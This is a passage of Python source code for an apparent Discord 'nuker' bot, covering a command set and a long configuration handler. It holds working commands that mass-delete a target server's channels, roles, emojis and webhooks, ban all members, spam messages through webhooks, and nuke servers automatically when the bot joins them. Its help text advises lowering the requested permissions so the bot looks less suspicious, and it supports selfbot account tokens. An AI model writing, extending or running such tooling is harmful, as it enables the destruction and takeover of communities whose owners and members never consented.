q.join()
consoleLog(f'{Fore.GREEN}Finished deleting roles.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllChannels', aliases=['dac', 'dAllChannels'])
async def deleteAllChannels(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all types of channels...', True)
for channel in selected_server.channels:
q.put((requests.delete, f'https://discord.com/api/v8/channels/{channel.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting channels.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllEmojis', aliases=['dae', 'dAllEmoji'])
async def deleteAllEmojis(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all emojis...', True)
for emote in selected_server.emojis:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/emojis/{emote.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting emojis.', True)
@commands.check(checkPerm)
@client.command(name='deleteAllWebhooks', aliases=['daw', 'dAllWebhooks'])
async def deleteAllWebhooks(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all webhooks...', True)
for webhook in await selected_server.webhooks():
q.put((requests.delete, f'https://discord.com/api/v8/webhooks/{webhook.id}', headers, None))
q.join()
consoleLog(f'{Fore.GREEN}Finished deleting webhooks.', True)
@commands.check(checkPerm)
@client.command(name='banAll')
async def banAll(ctx):
if not await hasTarget(ctx):
return
payload = {'delete_message_days':'0', 'reason': ''}
consoleLog(f'{Fore.YELLOW}Starting ban all...', True)
for member_ in selected_server.members:
if f'{member_.name}#{member_.discriminator}' in settings['ban_whitelist'] or str(member_.id) in settings['ban_whitelist']:
consoleLog(f'Ban skipped for {member_.name}#{member_.discriminator} -> in ban whitelist')
continue
q.put((requests.put, f'https://discord.com/api/v8/guilds/{selected_server.id}/bans/{member_.id}', headers, payload))
q.join()
consoleLog(f'{Fore.GREEN}Ban all completed.', True)
## Configuration command ##
@commands.check(checkPerm)
@client.command(name='config')
async def config(ctx, command=None, *, args=None):
global settings, settings_copy
async def embed_list(n, title, array):
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item) > 17:
item = item[:17] + '...'
names += f'{str(i+1)}) {item}\n'
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Items', value=names, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}\n' +
('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
if command is None:
status_list = []
features_list = []
temp = settings.copy()
features_list.append('bomb_messages')
if temp['bomb_messages']['random'] is None or len(temp['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('webhook_spam')
if len(temp['webhook_spam']['usernames']) == 0 or len(temp['webhook_spam']['pfp_urls']) == 0 or len(temp['webhook_spam']['contents']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
del temp['bomb_messages']
del temp['webhook_spam']
for feature in temp:
features_list.append(feature)
if settings[feature] is None or (type(settings[feature]).__name__ == 'list' and len(settings[feature]) == 0):
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Nuking features',
description = f':white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'Use `{settings["command_prefix"]}config <feature>` to get more information about how to config that feature.\n\n`{settings["command_prefix"]}config save <file name>` to save the current config. If you save the config as `default.json` the bot next time will directly start with whatever is in that `.json` file.', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
return
command = command.lower()
#################
# permissions #
#################
if command == 'permissions' or command == 'permission' or command == 'perms' or command == 'perm':
if args is None:
status_list = []
features_list = []
features_list.append('permissions')
if len(settings['permissions']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Permissions list',
description = f'Permissions for using the bot are given to the users.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`permissions add <userTag or userID> [userTag or userID] [user...` - grant permissions to the given user(s)\n\n`permissions remove <line number> [line number] [line...` - remove line(s) from the list\n\n`permissions list [page number]` - list all users that are in the permission list', inline=False)
embed.set_footer(text=('Config is saved' if configIsSaved() else '(*)Config is not saved'))
await ctx.send(embed=embed)
else:
args = args.split()
def alreadyExisted(checkingID):
for userID_index in range(len(settings['permissions'])):
if settings['permissions'][userID_index] == checkingID:
return True, userID_index
return False, None
if args[0] == 'add':
del args[0]
for userID in args:
existed, checkedID_index = alreadyExisted(userID)
if existed:
await log(ctx, f'Failed to add `{settings["permissions"][checkedID_index]}`. Already existed the permission list.')
continue
else:
settings['permissions'].append(userID)
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['permissions'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['permissions'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'permission list', settings['permissions'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
#################
# bomb_messages #
#################
elif command == 'bomb_messages' or command == 'bomb_message' or command == 'bomb':
if args is None:
status_list = []
features_list = []
features_list.append('random')
if settings['bomb_messages']['random'] is None:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
features_list.append('fixed')
if len(settings['bomb_messages']['fixed']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bomb_messages',
description = f'Config for all the bomb commands.\nWhen you run bomb commands like `{settings["command_prefix"]}channelbomb 100 fixed` the fixed is the type of word list you are going to use. In this case the word list is going to randomly pick texts from the "fixed" list.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`bomb_messages fixed add <command>` - add contents to the back of the list\n\n`bomb_messages fixed remove <line number> [line number] [line...` - remove line(s) from the list\n\n`bomb_messages fixed list [page number]` - list contents that are in the content list\n\n`bomb_messages random <character length>` - sets character length for bomb commands like `{settings["command_prefix"]}kaboom 100 b64`(b64 = base64) ', inline=False)
embed.set_footer(text='Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0].lower() == 'random':
if len(args) > 1 and args[1].isdigit() and (1 <= (length := int(args[1])) <= 1024):
settings['bomb_messages']['random'] = length
await log(ctx, f'Random-message length has been set to `{str(length)}`.')
else:
await log(ctx, 'Please enter a positive integer that is between 1 and 1024.')
elif args[0].lower() == 'fixed':
if args[1] == 'add':
if len(args) > 2 and (1 <= len(text := ' '.join(args[2:])) <= 100):
settings['bomb_messages']['fixed'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 100 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['bomb_messages']['fixed'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['bomb_messages']['fixed'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from bomb_messages fixed list.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'bomb_messages fixed list', settings['bomb_messages']['fixed'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unable to find {args[0]} config.')
################
# webhook #
################
elif command == 'webhook_spam':
if args is None:
status_list = []
features_list = []
for feature in settings['webhook_spam']:
features_list.append(feature)
if len(settings['webhook_spam'][feature]) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'webhook_spam',
description = f'Using webhook to spam messages. To send a message from discord webhook it requires 3 items: usernames, profile picture, and contents. For profile picture you can only put an image URL or put `none` for no pfp.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Types', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`webhook_spam <type> add <command>` - add contents to the back of the list\n\n`webhook_spam <type> remove <line number> [line number] [line...` - remove line(s) from the list\n\n`webhook_spam <type> list [page number]` - list contents that are in the content list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'usernames' or args[0] == 'username':
if args[1] == 'add':
if len(args) > 2 and (0 < len(text := ' '.join(args[2:])) <= 32):
settings['webhook_spam']['usernames'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 32 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['usernames'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['usernames'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam usernames list', settings['webhook_spam']['usernames'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'pfp_urls' or args[0] == 'pfp_url' or args[0] == 'pfp':
if args[1] == 'add':
if len(args) > 1 and args[2].lower() == 'none':
settings['webhook_spam']['pfp_urls'].append(None)
await log(ctx, f'No pfp item has been added')
elif len(args) > 1 and (text := args[2].startswith(('https://', 'http://'))):
settings['webhook_spam']['pfp_urls'].append(text)
await log(ctx, f'URL added.')
else:
await log(ctx, f'Please enter an **image URL**. Note: the link must start with http(s) protocals. Or enter `none` for no pfp.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['pfp_urls'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['pfp_urls'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from pfp_urls.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam pfp_urls list', settings['webhook_spam']['pfp_urls'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'contents' or args[0] == 'content':
if args[1] == 'add':
if len(args) > 1 and (0 < len(text := ' '.join(args[2:])) <= 2000):
settings['webhook_spam']['contents'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 2000 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['contents'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['contents'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from contents.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam contents list', settings['webhook_spam']['contents'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unknown type: `{args[0]}`')
elif command == 'after':
if args is None:
status_list = []
features_list = []
features_list.append('after')
if len(settings['after']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'After commands',
description = f'All the commands in this list will run after `{settings["command_prefix"]}nuke`. It can be disabled by adding "false" after the nuke command: `{settings["command_prefix"]}nuke false`.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`after add <command>` - add command to the back of the command list\n\n`after remove <line number> [line number] [line...` - remove line(s) in the command list\n\n`after insert <line number> <command>` - insert command after the given line. Note: use `insert 0 <command>` to insert the command to the first line\n\n`after list [page number]` - list commands that are in the command list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['after'].append(text)
await log(ctx, f'Command added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the command you want to add after line `{len(settings["after"])}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['after'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['after'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter the line(s) that you want to remove from after commands.')
elif args[0] == 'insert':
if len(args) > 2 and args[1].isdigit():
if not (0 <= (index := int(args[1])) <= len(settings['after'])) or len(settings['after']) == 0:
await log(ctx, f'Line `{args[1]}` doesn\'t exist.')
return
settings['after'].insert(index, ' '.join(args[2:]))
await log(ctx, f'Added command after line `{args[1]}`.')
else:
await log(ctx, 'Insert usage: `after insert <after line #> <command...>`')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'after command(s) list', settings['after'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'bot_status':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_status',
description = f'Whenever the bot boot up the status will be set to a given status.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value=f'{settings["bot_status"]}', inline=True)
embed.add_field(name='Features', value='bot_status', inline=True)
embed.add_field(name='Usage', value=f'`bot_status <on start status>` - set the on start status. Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`. By default it is set to `offline`.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if (args := args.lower()) in ['online', 'offline', 'idle', 'dnd', 'do_not_disturb']:
settings['bot_status'] = args
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`.')
elif command == 'bot_permission':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_permission',
description = f'If you are using a selfbot, then you don\'t have to do anything to this section. This bot_permission section is for normal bot invite URL that will ask the person inviting it for permission/roles (ex. admin, server manager). The default is set to 2146958847, which asks for all permissions. If you want to make the bot less sus, you can remove the permissions that are not needed.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Value', value=f'{settings["bot_permission"]}', inline=True)
embed.add_field(name='Features', value='bot_permission', inline=True)
embed.add_field(name='Usage', value=f'`bot_permission <value>` - set permissions value to the given number. Use this [permission calculator](https://wizbot.cc/permissions-calculator/?v=0) to help you calculate the values. Note: if you are going to use that calculator all you need is to copy the number that is display at the top, and then use this command.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= int(args) <= 2146958847:
settings['bot_permission'] = args
await log(ctx, 'Bot permission has been set to `{args}`.')
else:
await log(ctx, 'Please enter a value between 0 and 2146958847.')
elif command == 'save':
def check(message: discord.Message):
return message.author.id == ctx.message.author.id
if args is None:
await log(ctx, f'You need to name the file. Use `{settings["command_prefix"]}save <file name>`.')
return
parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(parent_dir, args.translate(bad_filename_map))
if os.path.isfile(config_path):
await log(ctx, f'Configuration file named {args} already exist. Do you want to overwrite it? [Y/n]')
while True:
try:
msg = (await client.wait_for('message', check=check, timeout=10)).content.lower()
if msg == 'y' or msg == 'yes':
with open(config_path, 'w') as f:
f.write(json.dumps(settings))
break
elif msg == 'n' or msg == 'no':
await log(ctx, f'Saving cancelled.')
return
await log(ctx, f'Yes or no.')
except (asyncio.exceptions.TimeoutError, discord.ext.commands.errors.CommandInvokeError):
await log(ctx, "Took too long to answer.")
return
else:
if not os.path.isdir(parent_dir):
os.mkdir(parent_dir)
with open(config_path, 'w+') as f:
f.write(json.dumps(settings))
global settings_copy
settings_copy = deepcopy(settings)
await log(ctx, 'Finished saving.')
elif command == 'verbose':
if args is None:
status_list = []
features_list = []
# hard coding this because I don't think there's a better way to set the values.
features_list.append('Log response from requests')
if want_log_request:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in console')
if want_log_console:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in discord chat')
if want_log_message:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log any errors')
if want_log_errors:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'verbose',
description = f'Verbose is the log level. Meaning that if you don\'t want any one of the logs to spam rate limiting errors or whatever errors that the bot is going to throw at you, you can disable them to prevent some lag.\n\nCurrent verbose value: `{str(settings["verbose"])}`\n:white_check_mark: = Enabled\n:x: = Disabled\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Logs', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`verbose <value>` - enable and disable the logs. Subtracting the values below from the current verbose to disable the log(s) you want, and adding the values will enable them. For example if I want to disable "Log any error" I will subtract 8 from 15 to get 7 and use 7 as the new verbose value to set, if I want to disable more like "Log response from request" I will substract 1 from 7 to get 6. To enable them back just add 8 and 1 to the current verbose value.\n\n`1` - Log response from requests\n`2` - Log messages in console\n`4`- Log messages in discord chat\n`8` - Log any errors.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= (args := int(args)) <= 15:
settings['verbose'] = args
updateVerbose()
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'You can only enter a positve integer between or on 0 and 15.')
elif command == 'ban_whitelist':
if args is None:
status_list = []
features_list = []
features_list.append('ban_whitelist')
if len(settings['ban_whitelist']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Ban whitelist',
description = f'Ban whitelist is used for telling `{settings["command_prefix"]}banAll` and `{settings["command_prefix"]}nuke` to not ban the users in the list. You can put discord tag or discord ID in the list, but it is recommended to use discord ID because in the pass there has some uncheckable discord tags.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`ban_whitelist add <command>` - add user to the back of the command list\n\n`ban_whitelist remove <line number> [line number] [line...` - remove line(s) in the ban whitelist\n\n`ban_whitelist list [page number]` - list users that are in the ban whitelist', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['ban_whitelist'].append(text)
await log(ctx, f'User added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the userID or userTag that you want to add after line `{str(len(settings["after"]))}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['ban_whitelist'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['ban_whitelist'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'ban whitelist', settings['ban_whitelist'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'proxies':
await log(ctx, 'This feature has been disable for now due to unhandled slow/bad proxies.')
elif command == 'prefix' or command == 'command_prefix':
if args is None:
await log(ctx, f'Use `` {command_prefix}config command_prefix <command_prefix> ``')
else:
settings['command_prefix'] = client.command_prefix = args
await log(ctx, 'Command prefix changed.')
elif command == 'token':
if args is None:
await log(ctx, 'Usage: `token <new token>` - new token for this config. Restarting the bot will be required. And remember to save the config before restarting.')
else:
settings['token'] = args
await log(ctx, 'New token has been set.')
else:
await log(ctx, f'Unable to find the config. `{command}`')
## Additional functions ##
@commands.check(checkPerm)
@client.command(name='checkRolePermissions', aliases=['check', 'crp'])
async def checkRolePermissions(ctx, name, n='1'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
member_ = containing(selected_server.members, nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to found {name}.')
return
value = member_.guild_permissions.value
temp = sorted(member_.guild_permissions, key=lambda p: p)
master_list = ''
item_length = 31
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item, has_perm = temp[i]
if has_perm:
master_list += ':white_check_mark: '
else:
master_list += ':x: '
master_list += item.replace('_', ' ').capitalize() + '\n'
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog('\n%s*Check role permissions*\n%sPermission value -> %s%d : 2147483647\n%s %s%d/%d' % (Fore.CYAN, Fore.RESET, Fore.YELLOW, value, master_list.replace(':white_check_mark:', f'{Fore.GREEN}+').replace(':x:', f'{Fore.RED}-'), Fore.YELLOW, n+1, ceil(item_length / per_page)), True)
# else:
try:
embed = discord.Embed(
title = 'User permissions',
description = f'Encoded value: {str(value)} : 2147483647',
color = discord.Color.red()
)
embed.add_field(name='Permissions', value=master_list, inline=True)
embed.set_footer(text=f'{str(n+1)}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
await ctx.send('```diff\n%s %d/%d```' % (master_list.replace(':white_check_mark:', '+').replace(':x:', '-'), n+1, ceil(item_length / per_page)))
@commands.check(checkPerm)
@client.command(name='serverIcon', aliases=['si', 'changeServerIcon'])
async def serverIcon(ctx, path=None):
if not await hasTarget(ctx):
return
if path is None:
await selected_server.edit(icon=None)
await log(ctx, f'Successfully removed the server icon from `{selected_server.name}`.')
elif path.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
await selected_server.edit(icon=BytesIO(requests.get(path).content).read())
consoleLog('Successfully changed the current server icon.')
except:
consoleLog(f'Unable to change the server icon to "{path}".')
elif path[0] == '<': # EX: <a:triggeredd:627060014431076352>
path = path.split(':')
try:
if path[0] == '<a': # Animated
await selected_server.edit(icon=discord.File(BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.gif?v=1').content).read()))
else:
await selected_server.edit(icon=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.png?v=1').content).read())
await log(ctx, 'Successfully changed server icon.')
except:
raise
elif os.path.isfile(path): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(path, 'rb') as data:
await selected_server.edit(icon=data.read())
await log(ctx, 'Successfully changed server icon.')
else:
try:
unicode_number = str(ord(path)) + ', '
except:
unicode_number = ''
unicode_string = path.encode('utf8')
sys.stdout.buffer.write(f'"{path}" is not supported to be set as a server icon.'.encode('utf8'))
consoleLog(unicode_number)
await log(ctx, f'{path} is not supported to be set as a server icon.')
await log(ctx, f'Character\'s bytes: {unicode_number}{unicode_string}')
@commands.check(checkPerm)
@client.command(name='serverName', aliases=['sn', 'changeServerName'])
async def serverName(ctx, *, name):
if not await hasTarget(ctx):
return
try:
await selected_server.edit(name=name)
await log(ctx, f'Server name has been changed to `{name}`.')
except discord.errors.Forbidden:
await log(ctx, 'Unable to change server name.')
raise
except:
raise
@commands.check(checkPerm)
@client.command(name='purge', aliases=['clear'])
async def purge(ctx, n=None):
if not await hasTarget(ctx):
return
consoleLog('Purging messages...', True)
if n is not None and (not n.isdigit() or (n := int(n)) < 1):
await log(ctx, 'Please enter a positive integer.')
return
to_delete_messages = await ctx.channel.history(limit=n).flatten()
consoleLog('Due to discord ratelimitings purging messages cannot be run in a fast pace. After every message the bot will timeout for 3 seconds', True)
delay_time = 0
for message in to_delete_messages:
while True:
await asyncio.sleep(delay_time)
r = requests.delete(f'https://discord.com/api/v8/channels/{ctx.channel.id}/messages/{message.id}', headers=headers)
if r.status_code == 429:
delay_time = r.json()['retry_after']
consoleLog(f'ratelimiting reached. Purging delay has been set to -> {str(delay_time)} seconds')
else:
break
@commands.check(checkPerm)
@client.command(name='leave')
async def leave(ctx, name=None):
if name is None:
if not await hasTarget(ctx):
return
await selected_server.leave()
else:
server = containing(client.guilds, name)
if server is None:
await log(ctx, f'Unable to find server {name}.')
return
await server.leave()
if not isDM(ctx) and ctx.guild.id == selected_server.id:
consoleLog(f'{Fore.BLUE}Goodbye {selected_server.name}! {Fore.YELLOW}-> {Fore.GREEN}Left {Fore.RESET}{selected_server.name}.', True)
else:
await log(ctx, f'Goodbye {selected_server.name}! -> Left {selected_server.name}.')
@commands.check(checkPerm)
@client.command(name='leaveAll')
async def leaveAll(ctx):
await log(ctx, 'Leaving all servers. Note: You won\'t be able to message me after I left all servers.')
for server in client.guilds:
await server.leave()
consoleLog('Left all servers.', True)
@commands.check(checkPerm)
@client.command(name='joinNuke', aliases=['nukeOnJoin', 'join nuke'])
async def joinNuke(ctx, true_or_false):
global saved_ctx, nuke_on_join
if true_or_false.lower() == 'true':
saved_ctx = ctx
nuke_on_join = True
await log(ctx, 'Nuke on bot joining a new server has been turned on.')
elif true_or_false.lower() == 'false':
nuke_on_join = False
await log(ctx, 'Nuke on bot joining a new server has been turned off.')
else:
await log(ctx, 'Invalid flag: true or false. Note: true or false is not case sensitive.')
@commands.check(checkPerm)
@client.command(name='changeStatus', aliases=['cs'])
async def changeStatus(ctx, status):
if status == 'offline':
await client.change_presence(status=discord.Status.offline)
elif status == 'invisible':
await client.change_presence(status=discord.Status.invisible)
elif status == 'online':
await client.change_presence(status=discord.Status.online)
elif status == 'idle':
await client.change_presence(status=discord.Status.idle)
elif status == 'dnd' or status == 'do_not_disturb':
await client.change_presence(status=discord.Status.do_not_disturb)
@commands.check(checkPerm)
@client.command(name='link', aliases=['l'])
async def link(ctx):
if not is_selfbot:
await ctx.channel.send(f'https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
else:
await log(ctx, f'This account is not a bot :). You can join servers with invite codes.')
@commands.check(checkPerm)
@client.command(name='autoNick', aliases=['an'])
async def autoNick(ctx):
if not await hasTarget(ctx):
return
global auto_nick
if not auto_nick:
consoleLog(f'{Fore.CYAN}Auto nickname is on.', True)
auto_nick = True
while auto_nick:
# payload = {'nick': ''.join(choice(alphanum) for _ in range(10))}
# q.put((requests.patch, f'https://discord.com/api/v8/guilds/{selected_server.id}/members/%40me/nick', headers, payload))
await selected_server.me.edit(nick=''.join(choices(alphanum, k=10)))
else:
consoleLog(f'{Fore.BLUE}Auto nickname is off.', True)
auto_nick = False
@commands.check(checkPerm)
@client.command(name='autoStatus', aliases=['as'])
async def autoStatus(ctx):
global auto_status
